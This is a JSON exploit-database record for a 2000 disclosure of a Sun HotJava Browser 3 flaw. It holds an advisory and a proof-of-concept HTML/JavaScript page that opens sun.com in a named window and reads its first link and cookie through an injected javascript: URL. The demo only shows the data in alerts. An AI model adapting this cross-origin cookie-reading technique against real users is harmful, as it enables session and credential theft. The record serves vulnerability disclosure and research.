{"id": "EXPLOITPACK:D8573474BE3A46F9906B98D877A33D8C", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "Sun HotJava Browser 3 - Arbitrary DOM Access", "description": "\nSun HotJava Browser 3 - Arbitrary DOM Access", "published": "2000-10-25T00:00:00", "modified": "2000-10-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Georgi Guninski", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-04-01T19:04:50", "viewCount": 8, "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1678959810, "score": 1684000228, "epss": 1678961154}, "_internal": {"score_hash": "a2d65da3f976ef756c854de9e9bf1be1"}, "sourceData": "source: https://www.securityfocus.com/bid/1837/info\n\nA malicious website operator may be able to obtain cookies from a target system browsing with Sun HotJava Browser. \n\nThe Document Object Model (DOM) of arbitrary URLs can be accessed if a specially formed javascript is launched from a named window. Cookies that may contain sensitive information can be acquired through this method.\n\n<HTML>\n<HEAD>\n<TITLE>\nDemo - HotJava Browser 3.0 JavaScript security vulnerability\n</TITLE>\n</HEAD>\n<BODY>\nDemo - HotJava Browser 3.0 JavaScript security vulnerability\n<BR>\nThis page shows the cookie and the first link from from www.sun.com in 10 seconds\n<BR>\nWritten by Georgi Guninski\n<BR>\n\n<SCRIPT>\nwindow.open(\"http://www.sun.com\",\"g\");\nsetTimeout(\"window.open('javascript:alert(\\\"The first link is: \\\"+document.links[0].href);alert(\\\"The cookie is: \\\"+document.cookie)','g')\",10000);\n</SCRIPT>\n\n<center>(C) Copyright 2000 Georgi Guninski</center>\n<BR>\n<center>\n| <a href=\"http://www.guninski.com\">Home</a> | \n<a href=\"browsers.html\">Internet Explorer</a> | \n<a href=\"win2k.html\">Windows 2000</a> | \n<a href=\"exploit.html\">AIX</a> | \n<a href=\"netscape.html\">Netscape</a> | \n<a href=\"greets.html\">Greets</a> | \n<a href=\"index.html\">More...</a> | \n</center>\n</BODY>\n</HTML>", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "remote", "platform": "multiple"}, "hackapp": {}, "toolHref": "", "w3af": {}}